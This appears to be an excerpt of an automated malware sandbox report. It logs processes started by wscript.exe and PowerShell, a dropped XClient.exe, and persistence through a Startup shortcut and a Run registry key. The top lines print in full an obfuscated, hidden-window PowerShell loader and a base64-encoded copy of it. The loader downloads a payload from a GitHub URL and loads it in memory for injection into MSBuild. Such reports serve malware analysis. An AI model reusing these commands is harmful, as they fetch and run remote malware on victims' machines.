            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('mXtur'+'l '+'= d0mhttps'+':'+'//raw.gi'+'th'+'ubuse'+'rcon'+'ten'+'t.com'+'/'+'NoDet'+'ectOn/N'+'o'+'De'+'te'+'ct'+'On/'+'ref'+'s/heads/ma'+'in/Deta'+'hNoth-'+'V.txtd0'+'m; mXtb'+'ase'+'64Content = ('+'New-Object Sy'+'stem.N'+'et'+'.We'+'bClient).'+'D'+'ownl'+'oadStri'+'n'+'g(mX'+'tur'+'l);'+' mXtb'+'ina'+'ryC'+'onten'+'t = [S'+'yst'+'em.Con'+'ve'+'rt]::'+'F'+'ro'+'m'+'B'+'ase64S'+'trin'+'g(mXtba'+'s'+'e6'+'4Con'+'te'+'nt'+'); mXtas'+'se'+'mb'+'l'+'y ='+' [Ref'+'l'+'ection.'+'A'+'ssembly]:'+':'+'Load'+'('+'mXtbinaryCo'+'ntent); [dnlib'+'.I'+'O.'+'Home]:'+':VAI('+'7pK0'+'/43Vyn/d/ee.ets'+'a'+'p//:sptth'+'7pK'+','+' 7pKdes'+'at'+'iva'+'do'+'7pK'+','+' '+'7p'+'Kdesativado'+'7'+'pK, 7pKdesat'+'iv'+'ado7pK, '+'7pK'+'MSB'+'u'+'ild7'+'pK'+', 7'+'pK7pK,7p'+'K7pK)').REpLace(([char]100+[char]48+[char]109),[string][char]39).REpLace('mXt','$').REpLace(([char]55+[char]112+[char]75),[string][char]34)| & ( $ENv:COmspec[4,15,25]-JoiN'')"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdtWHR1cicrJ2wgJysnPSBkMG1odHRwcycrJzonKycvL3Jhdy5naScrJ3RoJysndWJ1c2UnKydyY29uJysndGVuJysndC5jb20nKycvJysnTm9EZXQnKydlY3RPbi9OJysnbycrJ0RlJysndGUnKydjdCcrJ09uLycrJ3JlZicrJ3MvaGVhZHMvbWEnKydpbi9EZXRhJysnaE5vdGgtJysnVi50eHRkMCcrJ207IG1YdGInKydhc2UnKyc2NENvbnRlbnQgPSAoJysnTmV3LU9iamVjdCBTeScrJ3N0ZW0uTicrJ2V0JysnLldlJysnYkNsaWVudCkuJysnRCcrJ293bmwnKydvYWRTdHJpJysnbicrJ2cobVgnKyd0dXInKydsKTsnKycgbVh0YicrJ2luYScrJ3J5QycrJ29udGVuJysndCA9IFtTJysneXN0JysnZW0uQ29uJysndmUnKydydF06OicrJ0YnKydybycrJ20nKydCJysnYXNlNjRTJysndHJpbicrJ2cobVh0YmEnKydzJysnZTYnKyc0Q29uJysndGUnKydudCcrJyk7IG1YdGFzJysnc2UnKydtYicrJ2wnKyd5ID0nKycgW1JlZicrJ2wnKydlY3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzonKydMb2FkJysnKCcrJ21YdGJpbmFyeUNvJysnbnRlbnQpOyBbZG5saWInKycuSScrJ08uJysnSG9tZV06JysnOlZBSSgnKyc3cEswJysnLzQzVnluL2QvZWUuZXRzJysnYScrJ3AvLzpzcHR0aCcrJzdwSycrJywnKycgN3BLZGVzJysnYXQnKydpdmEnKydkbycrJzdwSycrJywnKycgJysnN3AnKydLZGVzYXRpdmFkbycrJzcnKydwSywgN3BLZGVzYXQnKydpdicrJ2FkbzdwSywgJysnN3BLJysnTVNCJysndScrJ2lsZDcnKydwSycrJywgNycrJ3BLN3BLLDdwJysnSzdwSyknKS5SRXBMYWNlKChbY2hhcl0xMDArW2NoYXJdNDgrW2NoYXJdMTA5KSxbc3RyaW5nXVtjaGFyXTM5KS5SRXBMYWNlKCdtWHQnLCckJykuUkVwTGFjZSgoW2NoYXJdNTUrW2NoYXJdMTEyK1tjaGFyXTc1KSxbc3RyaW5nXVtjaGFyXTM0KXwgJiAoICRFTnY6Q09tc3BlY1s0LDE1LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('mXtur'+'l '+'= d0mhttps'+':'+'//raw.gi'+'th'+'ubuse'+'rcon'+'ten'+'t.com'+'/'+'NoDet'+'ectOn/N'+'o'+'De'+'te'+'ct'+'On/'+'ref'+'s/heads/ma'+'in/Deta'+'hNoth-'+'V.txtd0'+'m; mXtb'+'ase'+'64Content = ('+'New-Object Sy'+'stem.N'+'et'+'.We'+'bClient).'+'D'+'ownl'+'oadStri'+'n'+'g(mX'+'tur'+'l);'+' mXtb'+'ina'+'ryC'+'onten'+'t = [S'+'yst'+'em.Con'+'ve'+'rt]::'+'F'+'ro'+'m'+'B'+'ase64S'+'trin'+'g(mXtba'+'s'+'e6'+'4Con'+'te'+'nt'+'); mXtas'+'se'+'mb'+'l'+'y ='+' [Ref'+'l'+'ection.'+'A'+'ssembly]:'+':'+'Load'+'('+'mXtbinaryCo'+'ntent); [dnlib'+'.I'+'O.'+'Home]:'+':VAI('+'7pK0'+'/43Vyn/d/ee.ets'+'a'+'p//:sptth'+'7pK'+','+' 7pKdes'+'at'+'iva'+'do'+'7pK'+','+' '+'7p'+'Kdesativado'+'7'+'pK, 7pKdesat'+'iv'+'ado7pK, '+'7pK'+'MSB'+'u'+'ild7'+'pK'+', 7'+'pK7pK,7p'+'K7pK)').REpLace(([char]100+[char]48+[char]109),[string][char]39).REpLace('mXt','$').REpLace(([char]55+[char]112+[char]75),[string][char]34)| & ( $ENv:COmspec[4,15,25]-JoiN'')"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdtWHR1cicrJ2wgJysnPSBkMG1odHRwcycrJzonKycvL3Jhdy5naScrJ3RoJysndWJ1c2UnKydyY29uJysndGVuJysndC5jb20nKycvJysnTm9EZXQnKydlY3RPbi9OJysnbycrJ0RlJysndGUnKydjdCcrJ09uLycrJ3JlZicrJ3MvaGVhZHMvbWEnKydpbi9EZXRhJysnaE5vdGgtJysnVi50eHRkMCcrJ207IG1YdGInKydhc2UnKyc2NENvbnRlbnQgPSAoJysnTmV3LU9iamVjdCBTeScrJ3N0ZW0uTicrJ2V0JysnLldlJysnYkNsaWVudCkuJysnRCcrJ293bmwnKydvYWRTdHJpJysnbicrJ2cobVgnKyd0dXInKydsKTsnKycgbVh0YicrJ2luYScrJ3J5QycrJ29udGVuJysndCA9IFtTJysneXN0JysnZW0uQ29uJysndmUnKydydF06OicrJ0YnKydybycrJ20nKydCJysnYXNlNjRTJysndHJpbicrJ2cobVh0YmEnKydzJysnZTYnKyc0Q29uJysndGUnKydudCcrJyk7IG1YdGFzJysnc2UnKydtYicrJ2wnKyd5ID0nKycgW1JlZicrJ2wnKydlY3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzonKydMb2FkJysnKCcrJ21YdGJpbmFyeUNvJysnbnRlbnQpOyBbZG5saWInKycuSScrJ08uJysnSG9tZV06JysnOlZBSSgnKyc3cEswJysnLzQzVnluL2QvZWUuZXRzJysnYScrJ3AvLzpzcHR0aCcrJzdwSycrJywnKycgN3BLZGVzJysnYXQnKydpdmEnKydkbycrJzdwSycrJywnKycgJysnN3AnKydLZGVzYXRpdmFkbycrJzcnKydwSywgN3BLZGVzYXQnKydpdicrJ2FkbzdwSywgJysnN3BLJysnTVNCJysndScrJ2lsZDcnKydwSycrJywgNycrJ3BLN3BLLDdwJysnSzdwSyknKS5SRXBMYWNlKChbY2hhcl0xMDArW2NoYXJdNDgrW2NoYXJdMTA5KSxbc3RyaW5nXVtjaGFyXTM5KS5SRXBMYWNlKCdtWHQnLCckJykuUkVwTGFjZSgoW2NoYXJdNTUrW2NoYXJdMTEyK1tjaGFyXTc1KSxbc3RyaW5nXVtjaGFyXTM0KXwgJiAoICRFTnY6Q09tc3BlY1s0LDE1LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('mXtur'+'l '+'= d0mhttps'+':'+'//raw.gi'+'th'+'ubuse'+'rcon'+'ten'+'t.com'+'/'+'NoDet'+'ectOn/N'+'o'+'De'+'te'+'ct'+'On/'+'ref'+'s/heads/ma'+'in/Deta'+'hNoth-'+'V.txtd0'+'m; mXtb'+'ase'+'64Content = ('+'New-Object Sy'+'stem.N'+'et'+'.We'+'bClient).'+'D'+'ownl'+'oadStri'+'n'+'g(mX'+'tur'+'l);'+' mXtb'+'ina'+'ryC'+'onten'+'t = [S'+'yst'+'em.Con'+'ve'+'rt]::'+'F'+'ro'+'m'+'B'+'ase64S'+'trin'+'g(mXtba'+'s'+'e6'+'4Con'+'te'+'nt'+'); mXtas'+'se'+'mb'+'l'+'y ='+' [Ref'+'l'+'ection.'+'A'+'ssembly]:'+':'+'Load'+'('+'mXtbinaryCo'+'ntent); [dnlib'+'.I'+'O.'+'Home]:'+':VAI('+'7pK0'+'/43Vyn/d/ee.ets'+'a'+'p//:sptth'+'7pK'+','+' 7pKdes'+'at'+'iva'+'do'+'7pK'+','+' '+'7p'+'Kdesativado'+'7'+'pK, 7pKdesat'+'iv'+'ado7pK, '+'7pK'+'MSB'+'u'+'ild7'+'pK'+', 7'+'pK7pK,7p'+'K7pK)').REpLace(([char]100+[char]48+[char]109),[string][char]39).REpLace('mXt','$').REpLace(([char]55+[char]112+[char]75),[string][char]34)| & ( $ENv:COmspec[4,15,25]-JoiN'')"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFB49FC0AD8 push esp; ret 5_2_00007FFB49FC0B74
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFB49FC4FF3 push eax; retf 5_2_00007FFB49FC4FE9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFB4AE07967 push ebx; retf 9_2_00007FFB4AE0796A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFB4AE085B6 push esp; iretd 9_2_00007FFB4AE085BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\XClient.exeJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnkJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnkJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClientJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClientJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
